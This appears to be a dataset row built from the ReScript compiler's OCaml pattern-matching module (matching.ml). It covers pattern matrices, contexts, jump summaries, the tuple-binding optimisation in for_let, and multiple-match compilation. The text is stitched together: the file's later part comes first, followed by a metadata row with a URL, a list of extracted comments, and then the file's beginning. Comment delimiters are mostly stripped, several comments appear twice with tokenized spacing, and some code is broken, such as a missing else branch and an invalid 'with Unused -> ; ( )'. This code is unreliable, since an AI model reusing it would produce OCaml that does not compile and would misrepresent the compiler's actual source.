| Tpat_alias _ | Tpat_variant _ | Tpat_record _
| Tpat_tuple _|Tpat_construct _ | Tpat_array _
| Tpat_or _ | Tpat_constant _ | Tpat_var _ | Tpat_any
-> false
let is_lazy p = find_in_pat is_lazy_pat p
let have_mutable_field p = match p with
| Tpat_record (lps,_) ->
List.exists
(fun (_,lbl,_) ->
match lbl.Types.lbl_mut with
| Mutable -> true
| Immutable -> false)
lps
| Tpat_alias _ | Tpat_variant _ | Tpat_lazy _
| Tpat_tuple _|Tpat_construct _ | Tpat_array _
| Tpat_or _
| Tpat_constant _ | Tpat_var _ | Tpat_any
-> false
let is_mutable p = find_in_pat have_mutable_field p
(* Downgrade Total when
1. Matching accesses some mutable fields;
2. And there are guards or lazy patterns.
*)
let check_partial is_mutable is_lazy pat_act_list = function
| Partial -> Partial
| Total ->
if
pat_act_list = [] || (* allow empty case list *)
List.exists
(fun (pats, lam) ->
is_mutable pats && (is_guarded lam || is_lazy pats))
pat_act_list
then Partial
else Total
let check_partial_list =
check_partial (List.exists is_mutable) (List.exists is_lazy)
let check_partial = check_partial is_mutable is_lazy
(* have toplevel handler when appropriate *)
let start_ctx n = [{left=[] ; right = omegas n}]
let check_total total lambda i handler_fun =
if jumps_is_empty total then
lambda
else begin
Lstaticcatch(lambda, (i,[]), handler_fun())
end
let compile_matching repr handler_fun arg pat_act_list partial =
let partial = check_partial pat_act_list partial in
match partial with
| Partial ->
let raise_num = next_raise_count () in
let pm =
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [arg, Strict] ;
default = [[[omega]],raise_num]} in
begin try
let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
check_total total lambda raise_num handler_fun
with
| Unused -> assert false (* ; handler_fun() *)
end
| Total ->
let pm =
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [arg, Strict] ;
default = []} in
let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
assert (jumps_is_empty total) ;
lambda
let partial_function loc () =
(* [Location.get_pos_info] is too expensive *)
let (fname, line, char) = Location.get_pos_info loc.Location.loc_start in
let fname =
Filename.basename fname
in
Lprim(Praise Raise_regular, [Lprim(Pmakeblock(Blk_extension),
[transl_normal_path Predef.path_match_failure;
Lconst(Const_block(Blk_tuple,
[Const_base(Const_string (fname, None));
Const_base(Const_int line);
Const_base(Const_int char)]))], loc)], loc)
let for_function loc repr param pat_act_list partial =
compile_matching repr (partial_function loc) param pat_act_list partial
In the following two cases , exhaustiveness info is not available !
let for_trywith param pat_act_list =
compile_matching None
(fun () -> Lprim(Praise Raise_reraise, [param], Location.none))
param pat_act_list Partial
let simple_for_let loc param pat body =
compile_matching None (partial_function loc) param [pat, body] Partial
Optimize binding of immediate tuples
The goal of the implementation of ' for_let ' below , which replaces
' simple_for_let ' , is to avoid tuple allocation in cases such as
this one :
let ( x , y ) =
let foo = ... in
if foo then ( 1 , 2 ) else ( 3,4 )
in bar
The compiler easily optimizes the simple ` let ( x , y ) = ( 1,2 ) in ... `
case ( call to Matching.for_multiple_match from Translcore ) , but
did n't optimize situations where the rhs tuples are hidden under
a more complex context .
The idea comes from who suggested and implemented
the following compilation method , based on :
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in x < - x1 ; y < - y1 )
else
( let x2 = 3 in let y2 = 4 in x < - x2 ; y < - y2 )
end ;
bar
The current implementation from uses Lstaticcatch /
Lstaticraise instead :
catch
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in exit x1 y1 )
else
( let x2 = 3 in let y2 = 4 in exit x2 y2 )
with x y - >
bar
The catch / exit is used to avoid duplication of the let body ( ' bar '
in the example ) , on ' if ' branches for example ; it is useless for
linear contexts such as ' let ' , but we do n't need to be careful to
generate nice code because Simplif will remove such useless
catch / exit .
The goal of the implementation of 'for_let' below, which replaces
'simple_for_let', is to avoid tuple allocation in cases such as
this one:
let (x,y) =
let foo = ... in
if foo then (1, 2) else (3,4)
in bar
The compiler easily optimizes the simple `let (x,y) = (1,2) in ...`
case (call to Matching.for_multiple_match from Translcore), but
didn't optimize situations where the rhs tuples are hidden under
a more complex context.
The idea comes from Alain Frisch who suggested and implemented
the following compilation method, based on Lassign:
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in x <- x1; y <- y1)
else
(let x2 = 3 in let y2 = 4 in x <- x2; y <- y2)
end;
bar
The current implementation from Gabriel Scherer uses Lstaticcatch /
Lstaticraise instead:
catch
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in exit x1 y1)
else
(let x2 = 3 in let y2 = 4 in exit x2 y2)
with x y ->
bar
The catch/exit is used to avoid duplication of the let body ('bar'
in the example), on 'if' branches for example; it is useless for
linear contexts such as 'let', but we don't need to be careful to
generate nice code because Simplif will remove such useless
catch/exit.
*)
let rec map_return f = function
| Llet (str, k, id, l1, l2) -> Llet (str, k, id, l1, map_return f l2)
| Lletrec (l1, l2) -> Lletrec (l1, map_return f l2)
| Lifthenelse (lcond, lthen, lelse) ->
Lifthenelse (lcond, map_return f lthen, map_return f lelse)
| Lsequence (l1, l2) -> Lsequence (l1, map_return f l2)
| Ltrywith (l1, id, l2) -> Ltrywith (map_return f l1, id, map_return f l2)
| Lstaticcatch (l1, b, l2) ->
Lstaticcatch (map_return f l1, b, map_return f l2)
| Lstaticraise _ | Lprim(Praise _, _, _) as l -> l
| l -> f l
The ' opt ' reference indicates if the optimization is worthy .
It is shared by the different calls to ' assign_pat ' performed from
' map_return ' . For example with the code
let ( x , y ) = if foo then z else ( 1,2 )
the else - branch will activate the optimization for both branches .
That means that the optimization is activated if * there exists * an
interesting tuple in one hole of the let - rhs context . We could
choose to activate it only if * all * holes are interesting . We made
that choice because being optimistic is extremely cheap ( one static
exit / catch overhead in the " wrong cases " ) , while being pessimistic
can be costly ( one unnecessary tuple allocation ) .
It is shared by the different calls to 'assign_pat' performed from
'map_return'. For example with the code
let (x, y) = if foo then z else (1,2)
the else-branch will activate the optimization for both branches.
That means that the optimization is activated if *there exists* an
interesting tuple in one hole of the let-rhs context. We could
choose to activate it only if *all* holes are interesting. We made
that choice because being optimistic is extremely cheap (one static
exit/catch overhead in the "wrong cases"), while being pessimistic
can be costly (one unnecessary tuple allocation).
*)
let assign_pat opt nraise catch_ids loc pat lam =
let rec collect acc pat lam = match pat.pat_desc, lam with
| Tpat_tuple patl, Lprim(Pmakeblock _, lams, _) ->
opt := true;
List.fold_left2 collect acc patl lams
| Tpat_tuple patl, Lconst(Const_block( _, scl)) ->
opt := true;
let collect_const acc pat sc = collect acc pat (Lconst sc) in
List.fold_left2 collect_const acc patl scl
| _ ->
pattern idents will be bound in ( let body ) , so we
refresh them here to guarantee binders uniqueness
refresh them here to guarantee binders uniqueness *)
let pat_ids = pat_bound_idents pat in
let fresh_ids = List.map (fun id -> id, Ident.rename id) pat_ids in
(fresh_ids, alpha_pat fresh_ids pat, lam) :: acc
in
(* sublets were accumulated by 'collect' with the leftmost tuple
pattern at the bottom of the list; to respect right-to-left
evaluation order for tuples, we must evaluate sublets
top-to-bottom. To preserve tail-rec, we will fold_left the
reversed list. *)
let rev_sublets = List.rev (collect [] pat lam) in
let exit =
build an Ident.tbl to avoid quadratic refreshing costs
let add t (id, fresh_id) = Ident.add id fresh_id t in
let add_ids acc (ids, _pat, _lam) = List.fold_left add acc ids in
let tbl = List.fold_left add_ids Ident.empty rev_sublets in
let fresh_var id = Lvar (Ident.find_same id tbl) in
Lstaticraise(nraise, List.map fresh_var catch_ids)
in
let push_sublet code (_ids, pat, lam) = simple_for_let loc lam pat code in
List.fold_left push_sublet exit rev_sublets
let for_let loc param pat body =
match pat.pat_desc with
| Tpat_any ->
This eliminates a useless variable ( and stack slot in bytecode )
for " let _ = ... " . See # 6865 .
for "let _ = ...". See #6865. *)
Lsequence(param, body)
| Tpat_var (id, _) ->
(* fast path, and keep track of simple bindings to unboxable numbers *)
Llet(Strict, Pgenval, id, param, body)
| _ ->
(* Turn off such optimization to reduce diff in the beginning - FIXME*)
if !Config.bs_only then simple_for_let loc param pat body
else
let opt = ref false in
let nraise = next_raise_count () in
let catch_ids = pat_bound_idents pat in
let bind = map_return (assign_pat opt nraise catch_ids loc pat) param in
if !opt then Lstaticcatch(bind, (nraise, catch_ids), body)
else simple_for_let loc param pat body
(* Handling of tupled functions and matchings *)
(* Easy case since variables are available *)
let for_tupled_function loc paraml pats_act_list partial =
let partial = check_partial_list pats_act_list partial in
let raise_num = next_raise_count () in
let omegas = [List.map (fun _ -> omega) paraml] in
let pm =
{ cases = pats_act_list;
args = List.map (fun id -> (Lvar id, Strict)) paraml ;
default = [omegas,raise_num]
} in
try
let (lambda, total) = compile_match None partial
(start_ctx (List.length paraml)) pm in
check_total total lambda raise_num (partial_function loc)
with
| Unused -> partial_function loc ()
let flatten_pattern size p = match p.pat_desc with
| Tpat_tuple args -> args
| Tpat_any -> omegas size
| _ -> raise Cannot_flatten
let rec flatten_pat_line size p k = match p.pat_desc with
| Tpat_any -> omegas size::k
| Tpat_tuple args -> args::k
| Tpat_or (p1,p2,_) -> flatten_pat_line size p1 (flatten_pat_line size p2 k)
Note : if this ' as ' pat is here , then this is a
useless binding , solves
useless binding, solves PR#3780 *)
flatten_pat_line size p k
| _ -> fatal_error "Matching.flatten_pat_line"
let flatten_cases size cases =
List.map
(fun (ps,action) -> match ps with
| [p] -> flatten_pattern size p,action
| _ -> fatal_error "Matching.flatten_case")
cases
let flatten_matrix size pss =
List.fold_right
(fun ps r -> match ps with
| [p] -> flatten_pat_line size p r
| _ -> fatal_error "Matching.flatten_matrix")
pss []
let flatten_def size def =
List.map
(fun (pss,i) -> flatten_matrix size pss,i)
def
let flatten_pm size args pm =
{args = args ; cases = flatten_cases size pm.cases ;
default = flatten_def size pm.default}
let flatten_precompiled size args pmh = match pmh with
| Pm pm -> Pm (flatten_pm size args pm)
| PmOr {body=b ; handlers=hs ; or_matrix=m} ->
PmOr
{body=flatten_pm size args b ;
handlers=
List.map
(fun (mat,i,vars,pm) -> flatten_matrix size mat,i,vars,pm)
hs ;
or_matrix=flatten_matrix size m ;}
| PmVar _ -> assert false
is a ` ` comp_fun '' argument to comp_match_handlers .
Hence it needs a fourth argument , which it ignores
compiled_flattened is a ``comp_fun'' argument to comp_match_handlers.
Hence it needs a fourth argument, which it ignores
*)
let compile_flattened repr partial ctx _ pmh = match pmh with
| Pm pm -> compile_match repr partial ctx pm
| PmOr {body=b ; handlers=hs} ->
let lam, total = compile_match repr partial ctx b in
compile_orhandlers (compile_match repr partial) lam total ctx hs
| PmVar _ -> assert false
let do_for_multiple_match loc paraml pat_act_list partial =
let repr = None in
let partial = check_partial pat_act_list partial in
let raise_num,pm1 =
match partial with
| Partial ->
let raise_num = next_raise_count () in
raise_num,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [[[omega]],raise_num] }
| _ ->
-1,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [] } in
try
try
(* Once for checking that compilation is possible *)
let next, nexts = split_precompile None pm1 in
let size = List.length paraml
and idl = List.map (fun _ -> Ident.create "match") paraml in
let args = List.map (fun id -> Lvar id, Alias) idl in
let flat_next = flatten_precompiled size args next
and flat_nexts =
List.map
(fun (e,pm) -> e,flatten_precompiled size args pm)
nexts in
let lam, total =
comp_match_handlers
(compile_flattened repr)
partial (start_ctx size) () flat_next flat_nexts in
List.fold_right2 (bind Strict) idl paraml
(match partial with
| Partial ->
check_total total lam raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lam)
with Cannot_flatten ->
let (lambda, total) = compile_match None partial (start_ctx 1) pm1 in
begin match partial with
| Partial ->
check_total total lambda raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lambda
end
with Unused ->
; ( )
(* PR#4828: Believe it or not, the 'paraml' argument below
may not be side effect free. *)
let param_to_var param = match param with
| Lvar v -> v,None
| _ -> Ident.create "match",Some param
let bind_opt (v,eo) k = match eo with
| None -> k
| Some e -> Lambda.bind Strict v e k
let for_multiple_match loc paraml pat_act_list partial =
let v_paraml = List.map param_to_var paraml in
let paraml = List.map (fun (v,_) -> Lvar v) v_paraml in
List.fold_right bind_opt v_paraml
(do_for_multiple_match loc paraml pat_act_list partial)
| null | https://raw.githubusercontent.com/rescript-lang/rescript-compiler/5da6c88fb9237fbc4d61640187b82627690ccf39/jscomp/ml/matching.ml | ocaml | ************************************************************************
OCaml
en Automatique.
All rights reserved. This file is distributed under the terms of
special exception on linking described in the file LICENSE.
************************************************************************
Compilation of pattern matching
Many functions on the various data structures of the algorithm :
- Pattern matrices.
- Default environments: mapping from matrices to exit numbers.
- Contexts: matrices whose column are partitioned into
left and right.
- Jump summaries: mapping from exit numbers to contexts
Context pruning
Pattern matching before any compilation
Pattern matching after application of both the or-pat rule and the
mixture rule
prerr_string " -> " ;
Printlambda.lambda Format.str_formatter l ;
prerr_string (Format.flush_str_formatter ()) ;
Identifying some semantically equivalent lambda-expressions,
Our goal here is also to
find alpha-equivalent (simple) terms
Introduce a catch, if worth it
Introduce a catch, if worth it, delayed version
Once matchings are simplified one can easily find
their nature
applies to simplified matchings only
A few operations on default environments
Or-pattern expansion, variables are a complication w.r.t. the article
Basic grouping predicates
Conditions for appending to the Or matrix
Insert or append a pattern in the Or matrix
attempt insert, for equivalent orpats with no variables
check append condition for head of O
check insert condition for tail of O
insert
fail to insert or append
check condition (b) for append
p # q, go on with append/insert
q is not an or-pat, go on with append/insert
[] in fact
success in appending
Could not success in raising up a constr matching up
This enables an extra division in some frequent cases :
last row is made of variables only
as splitted as it can
Precompile
Compute top information
If you need
General divide functions
Matching against a constructor
Matching against a variant
Matching against a variable
Matching and forcing a lazy value
Inlining the tag tests before calling the primitive that works on
lazy blocks. This is also used in translcore.ml.
No other call than Obj.tag when the value has been forced before.
Matching against a tuple pattern
Matching against a record pattern
Matching against an array pattern
Sequential equality tests
Dichotomic tree
Entry point
********************
********************
Add handler, if shared
Default action is always shared
Store all other actions
Retrieve all actions, including potential default
Array of actual actions
Reconstruct default and switch list
Note: dichotomic search requires sorted input with no duplicates
Attempt sharing on all actions
Fail is translated to exit, whatever happens
Reintroduce fail action in switch argument,
for the sake of avoiding carrying over huge switches
In case there is some hole and that a switch is emitted,
action 0 will be used as the action of unreachable
cases (cf. switch.ml, make_switch).
Hence, this action will be shared
Act as Total, this means
If no appropriate default matrix exists,
then this switch cannot fail
In line with the article and simpler than before
Too many non-matched constructors -> reduced information
Note as the bytecode compiler may resort to dichotomic search,
the clauses of stringswitch are sorted with duplicates removed.
This partly applies to the native code compiler, which requires
no duplicates
refine [split_cases] and [split_variant_cases]
Special cases for extensions
Regular concrete type
Identical actions, no failure
Typically, match on lists, will avoid isint primitive in that
case
The type defines constant constructors only
= Some act when all non-const constructors match to act
Emit a switch, as bytecode implements this sophisticated instruction
reduandant work under bs context
One can compare integers and pointers
One must not dereference integers
Insertion of debugging events
Attempt to avoid some useless bindings by lowering them
Approximation of v present in lam
eliminate let *sth* = from_option x in *sth*
Hum, -1 means never taken
| (-1,pm)::rem -> c_rec body total_body rem
To find reasonable names for variables
To be set by Lam_compile
verbose version of do_compile_matching, for debug
The entry points
Downgrade Total when
1. Matching accesses some mutable fields;
2. And there are guards or lazy patterns.
allow empty case list
have toplevel handler when appropriate
; handler_fun()
[Location.get_pos_info] is too expensive
sublets were accumulated by 'collect' with the leftmost tuple
pattern at the bottom of the list; to respect right-to-left
evaluation order for tuples, we must evaluate sublets
top-to-bottom. To preserve tail-rec, we will fold_left the
reversed list.
fast path, and keep track of simple bindings to unboxable numbers
Turn off such optimization to reduce diff in the beginning - FIXME
Handling of tupled functions and matchings
Easy case since variables are available
Once for checking that compilation is possible
PR#4828: Believe it or not, the 'paraml' argument below
may not be side effect free. | , projet Cristal , INRIA Rocquencourt
Copyright 1996 Institut National de Recherche en Informatique et
the GNU Lesser General Public License version 2.1 , with the
open Misc
open Asttypes
open Types
open Typedtree
open Lambda
open Parmatch
open Printf
let dbg = false
See Peyton - Jones , ` ` The Implementation of functional programming
languages '' , chapter 5 .
languages'', chapter 5. *)
Well , it was true at the beginning of the world .
Now , see Lefessant - Maranget ` ` Optimizing Pattern - Matching '' ICFP'2001
Well, it was true at the beginning of the world.
Now, see Lefessant-Maranget ``Optimizing Pattern-Matching'' ICFP'2001
*)
Compatibility predicate that considers potential rebindings of constructors
of an extension type .
" may_compat p q " returns false when p and q never admit a common instance ;
returns true when they may have a common instance .
Compatibility predicate that considers potential rebindings of constructors
of an extension type.
"may_compat p q" returns false when p and q never admit a common instance;
returns true when they may have a common instance.
*)
module MayCompat =
Parmatch.Compat (struct let equal = Types.may_equal_constr end)
let may_compat = MayCompat.compat
and may_compats = MayCompat.compats
let string_of_lam lam =
Printlambda.lambda Format.str_formatter lam ;
Format.flush_str_formatter ()
type matrix = pattern list list
let add_omega_column pss = List.map (fun ps -> omega::ps) pss
type ctx = {left:pattern list ; right:pattern list}
let pretty_ctx ctx =
List.iter
(fun {left=left ; right=right} ->
prerr_string "LEFT:" ;
pretty_line left ;
prerr_string " RIGHT:" ;
pretty_line right ;
prerr_endline "")
ctx
let le_ctx c1 c2 =
le_pats c1.left c2.left &&
le_pats c1.right c2.right
let lshift {left=left ; right=right} = match right with
| x::xs -> {left=x::left ; right=xs}
| _ -> assert false
let lforget {left=left ; right=right} = match right with
| _::xs -> {left=omega::left ; right=xs}
| _ -> assert false
let rec small_enough n = function
| [] -> true
| _::rem ->
if n <= 0 then false
else small_enough (n-1) rem
let ctx_lshift ctx =
if small_enough 31 ctx then
List.map lshift ctx
get_mins le_ctx (List.map lforget ctx)
end
let rshift {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=p::right}
| _ -> assert false
let ctx_rshift ctx = List.map rshift ctx
let rec nchars n ps =
if n <= 0 then [],ps
else match ps with
| p::rem ->
let chars, cdrs = nchars (n-1) rem in
p::chars,cdrs
| _ -> assert false
let rshift_num n {left=left ; right=right} =
let shifted,left = nchars n left in
{left=left ; right = shifted@right}
let ctx_rshift_num n ctx = List.map (rshift_num n) ctx
Recombination of contexts ( eg : ( _ , _ ): : p1::p2::rem - > ( )
All mutable fields are replaced by ' _ ' , since side - effects in
guards can alter these fields
All mutable fields are replaced by '_', since side-effects in
guards can alter these fields *)
let combine {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=set_args_erase_mutable p right}
| _ -> assert false
let ctx_combine ctx = List.map combine ctx
let ncols = function
| [] -> 0
| ps::_ -> List.length ps
exception NoMatch
exception OrPat
let filter_matrix matcher pss =
let rec filter_rec = function
| (p::ps)::rem ->
begin match p.pat_desc with
| Tpat_alias (p,_,_) ->
filter_rec ((p::ps)::rem)
| Tpat_var _ ->
filter_rec ((omega::ps)::rem)
| _ ->
begin
let rem = filter_rec rem in
try
matcher p ps::rem
with
| NoMatch -> rem
| OrPat ->
match p.pat_desc with
| Tpat_or (p1,p2,_) -> filter_rec [(p1::ps) ;(p2::ps)]@rem
| _ -> assert false
end
end
| [] -> []
| _ ->
pretty_matrix pss ;
fatal_error "Matching.filter_matrix" in
filter_rec pss
let make_default matcher env =
let rec make_rec = function
| [] -> []
| ([[]],i)::_ -> [[[]],i]
| (pss,i)::rem ->
let rem = make_rec rem in
match filter_matrix matcher pss with
| [] -> rem
| ([]::_) -> ([[]],i)::rem
| pss -> (pss,i)::rem in
make_rec env
let ctx_matcher p =
let p = normalize_pat p in
match p.pat_desc with
| Tpat_construct (_, cstr,omegas) ->
(fun q rem -> match q.pat_desc with
| Tpat_construct (_, cstr',args)
NB : may_constr_equal considers ( potential ) constructor rebinding
when Types.may_equal_constr cstr cstr' ->
p,args@rem
| Tpat_any -> p,omegas @ rem
| _ -> raise NoMatch)
| Tpat_constant cst ->
(fun q rem -> match q.pat_desc with
| Tpat_constant cst' when const_compare cst cst' = 0 ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_variant (lab,Some omega,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',Some arg,_) when lab=lab' ->
p,arg::rem
| Tpat_any -> p,omega::rem
| _ -> raise NoMatch)
| Tpat_variant (lab,None,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',None,_) when lab=lab' ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_array omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_array args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
| Tpat_tuple omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_tuple args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
Records are normalized
let len = Array.length lbl.lbl_all in
(fun q rem -> match q.pat_desc with
| Tpat_record (((_, lbl', _) :: _) as l',_)
when Array.length lbl'.lbl_all = len ->
let l' = all_record_args l' in
p, List.fold_right (fun (_, _,p) r -> p::r) l' rem
| Tpat_any -> p,List.fold_right (fun (_, _,p) r -> p::r) l rem
| _ -> raise NoMatch)
| Tpat_lazy omega ->
(fun q rem -> match q.pat_desc with
| Tpat_lazy arg -> p, (arg::rem)
| Tpat_any -> p, (omega::rem)
| _ -> raise NoMatch)
| _ -> fatal_error "Matching.ctx_matcher"
let filter_ctx q ctx =
let matcher = ctx_matcher q in
let rec filter_rec = function
| ({right=p::ps} as l)::rem ->
begin match p.pat_desc with
| Tpat_or (p1,p2,_) ->
filter_rec ({l with right=p1::ps}::{l with right=p2::ps}::rem)
| Tpat_alias (p,_,_) ->
filter_rec ({l with right=p::ps}::rem)
| Tpat_var _ ->
filter_rec ({l with right=omega::ps}::rem)
| _ ->
begin let rem = filter_rec rem in
try
let to_left, right = matcher p ps in
{left=to_left::l.left ; right=right}::rem
with
| NoMatch -> rem
end
end
| [] -> []
| _ -> fatal_error "Matching.filter_ctx" in
filter_rec ctx
let select_columns pss ctx =
let n = ncols pss in
List.fold_right
(fun ps r ->
List.fold_right
(fun {left=left ; right=right} r ->
let transfert, right = nchars n right in
try
{left = lubs transfert ps @ left ; right=right}::r
with
| Empty -> r)
ctx r)
pss []
let ctx_lub p ctx =
List.fold_right
(fun {left=left ; right=right} r ->
match right with
| q::rem ->
begin try
{left=left ; right = lub p q::rem}::r
with
| Empty -> r
end
| _ -> fatal_error "Matching.ctx_lub")
ctx []
let ctx_match ctx pss =
List.exists
(fun {right=qs} -> List.exists (fun ps -> may_compats qs ps) pss)
ctx
type jumps = (int * ctx list) list
let pretty_jumps (env : jumps) = match env with
| [] -> ()
| _ ->
List.iter
(fun (i,ctx) ->
Printf.fprintf stderr "jump for %d\n" i ;
pretty_ctx ctx)
env
let rec jumps_extract (i : int) = function
| [] -> [],[]
| (j,pss) as x::rem as all ->
if i=j then pss,rem
else if j < i then [],all
else
let r,rem = jumps_extract i rem in
r,(x::rem)
let rec jumps_remove (i:int) = function
| [] -> []
| (j,_)::rem when i=j -> rem
| x::rem -> x::jumps_remove i rem
let jumps_empty = []
and jumps_is_empty = function
| [] -> true
| _ -> false
let jumps_singleton i = function
| [] -> []
| ctx -> [i,ctx]
let jumps_add i pss jumps = match pss with
| [] -> jumps
| _ ->
let rec add = function
| [] -> [i,pss]
| (j,qss) as x::rem as all ->
if (j:int) > i then x::add rem
else if j < i then (i,pss)::all
else (i,(get_mins le_ctx (pss@qss)))::rem in
add jumps
let rec jumps_union (env1:(int*ctx list)list) env2 = match env1,env2 with
| [],_ -> env2
| _,[] -> env1
| ((i1,pss1) as x1::rem1), ((i2,pss2) as x2::rem2) ->
if i1=i2 then
(i1,get_mins le_ctx (pss1@pss2))::jumps_union rem1 rem2
else if i1 > i2 then
x1::jumps_union rem1 env2
else
x2::jumps_union env1 rem2
let rec merge = function
| env1::env2::rem -> jumps_union env1 env2::merge rem
| envs -> envs
let rec jumps_unions envs = match envs with
| [] -> []
| [env] -> env
| _ -> jumps_unions (merge envs)
let jumps_map f env =
List.map
(fun (i,pss) -> i,f pss)
env
type pattern_matching =
{ mutable cases : (pattern list * lambda) list;
args : (lambda * let_kind) list ;
default : (matrix * int) list}
type pm_or_compiled =
{body : pattern_matching ;
handlers : (matrix * int * Ident.t list * pattern_matching) list ;
or_matrix : matrix ; }
type pm_half_compiled =
| PmOr of pm_or_compiled
| PmVar of pm_var_compiled
| Pm of pattern_matching
and pm_var_compiled =
{inside : pm_half_compiled ; var_arg : lambda ; }
type pm_half_compiled_info =
{me : pm_half_compiled ;
matrix : matrix ;
top_default : (matrix * int) list ; }
let pretty_cases cases =
List.iter
(fun (ps,_l) ->
List.iter
(fun p ->
Parmatch.top_pretty Format.str_formatter p ;
prerr_string " " ;
prerr_string (Format.flush_str_formatter ()))
ps ;
prerr_endline "")
cases
let pretty_def def =
prerr_endline "+++++ Defaults +++++" ;
List.iter
(fun (pss,i) ->
Printf.fprintf stderr "Matrix for %d\n" i ;
pretty_matrix pss)
def ;
prerr_endline "+++++++++++++++++++++"
let pretty_pm pm =
pretty_cases pm.cases ;
if pm.default <> [] then
pretty_def pm.default
let rec pretty_precompiled = function
| Pm pm ->
prerr_endline "++++ PM ++++" ;
pretty_pm pm
| PmVar x ->
prerr_endline "++++ VAR ++++" ;
pretty_precompiled x.inside
| PmOr x ->
prerr_endline "++++ OR ++++" ;
pretty_pm x.body ;
pretty_matrix x.or_matrix ;
List.iter
(fun (_,i,_,pm) ->
eprintf "++ Handler %d ++\n" i ;
pretty_pm pm)
x.handlers
let pretty_precompiled_res first nexts =
pretty_precompiled first ;
List.iter
(fun (e, pmh) ->
eprintf "** DEFAULT %d **\n" e ;
pretty_precompiled pmh)
nexts
However , as shown by such sharing may hinders the
lambda - code invariant that all bound idents are unique ,
when switches are compiled to test sequences .
The definitive fix is the systematic introduction of exit / catch
in case action sharing is present .
lambda-code invariant that all bound idents are unique,
when switches are compiled to test sequences.
The definitive fix is the systematic introduction of exit/catch
in case action sharing is present.
*)
module StoreExp =
Switch.Store
(struct
type t = lambda
type key = lambda
let compare_key = compare
let make_key = Lambda.make_key
end)
let make_exit i = Lstaticraise (i,[])
let make_catch d k = match d with
| Lstaticraise (_,[]) -> k d
| _ ->
let e = next_raise_count () in
Lstaticcatch (k (make_exit e),(e,[]),d)
let rec as_simple_exit = function
| Lstaticraise (i,[]) -> Some i
| Llet (Alias,_k,_,_,e) -> as_simple_exit e
| _ -> None
let make_catch_delayed handler = match as_simple_exit handler with
| Some i -> i,(fun act -> act)
| None ->
let i = next_raise_count () in
Printf.eprintf " SHARE LAMBDA : % i\n%s\n " i ( string_of_lam handler ) ;
Printf.eprintf "SHARE LAMBDA: %i\n%s\n" i (string_of_lam handler);
*)
i,
(fun body -> match body with
| Lstaticraise (j,_) ->
if i=j then handler else body
| _ -> Lstaticcatch (body,(i,[]),handler))
let raw_action l =
match make_key l with | Some l -> l | None -> l
let tr_raw act = match make_key act with
| Some act -> act
| None -> raise Exit
let same_actions = function
| [] -> None
| [_,act] -> Some act
| (_,act0) :: rem ->
try
let raw_act0 = tr_raw act0 in
let rec s_rec = function
| [] -> Some act0
| (_,act)::rem ->
if raw_act0 = tr_raw act then
s_rec rem
else
None in
s_rec rem
with
| Exit -> None
Test for swapping two clauses
let up_ok_action act1 act2 =
try
let raw1 = tr_raw act1
and raw2 = tr_raw act2 in
raw1 = raw2
with
| Exit -> false
let up_ok (ps,act_p) l =
List.for_all
(fun (qs,act_q) ->
up_ok_action act_p act_q || not (may_compats ps qs))
l
The simplify function normalizes the first column of the match
- records are expanded so that they possess all fields
- aliases are removed and replaced by bindings in actions .
However or - patterns are simplified differently ,
- aliases are not removed
- or - patterns ( _ |p ) are changed into _
The simplify function normalizes the first column of the match
- records are expanded so that they possess all fields
- aliases are removed and replaced by bindings in actions.
However or-patterns are simplified differently,
- aliases are not removed
- or-patterns (_|p) are changed into _
*)
exception Var of pattern
let simplify_or p =
let rec simpl_rec p = match p with
| {pat_desc = Tpat_any|Tpat_var _} -> raise (Var p)
| {pat_desc = Tpat_alias (q,id,s)} ->
begin try
{p with pat_desc = Tpat_alias (simpl_rec q,id,s)}
with
| Var q -> raise (Var {p with pat_desc = Tpat_alias (q,id,s)})
end
| {pat_desc = Tpat_or (p1,p2,o)} ->
let q1 = simpl_rec p1 in
begin try
let q2 = simpl_rec p2 in
{p with pat_desc = Tpat_or (q1, q2, o)}
with
| Var q2 -> raise (Var {p with pat_desc = Tpat_or (q1, q2, o)})
end
| {pat_desc = Tpat_record (lbls,closed)} ->
let all_lbls = all_record_args lbls in
{p with pat_desc=Tpat_record (all_lbls, closed)}
| _ -> p in
try
simpl_rec p
with
| Var p -> p
let simplify_cases args cls = match args with
| [] -> assert false
| (arg,_)::_ ->
let rec simplify = function
| [] -> []
| ((pat :: patl, action) as cl) :: rem ->
begin match pat.pat_desc with
| Tpat_var (id, _) ->
(omega :: patl, bind Alias id arg action) ::
simplify rem
| Tpat_any ->
cl :: simplify rem
| Tpat_alias(p, id,_) ->
simplify ((p :: patl, bind Alias id arg action) :: rem)
| Tpat_record ([],_) ->
(omega :: patl, action)::
simplify rem
| Tpat_record (lbls, closed) ->
let all_lbls = all_record_args lbls in
let full_pat =
{pat with pat_desc=Tpat_record (all_lbls, closed)} in
(full_pat::patl,action)::
simplify rem
| Tpat_or _ ->
let pat_simple = simplify_or pat in
begin match pat_simple.pat_desc with
| Tpat_or _ ->
(pat_simple :: patl, action) ::
simplify rem
| _ ->
simplify ((pat_simple::patl,action) :: rem)
end
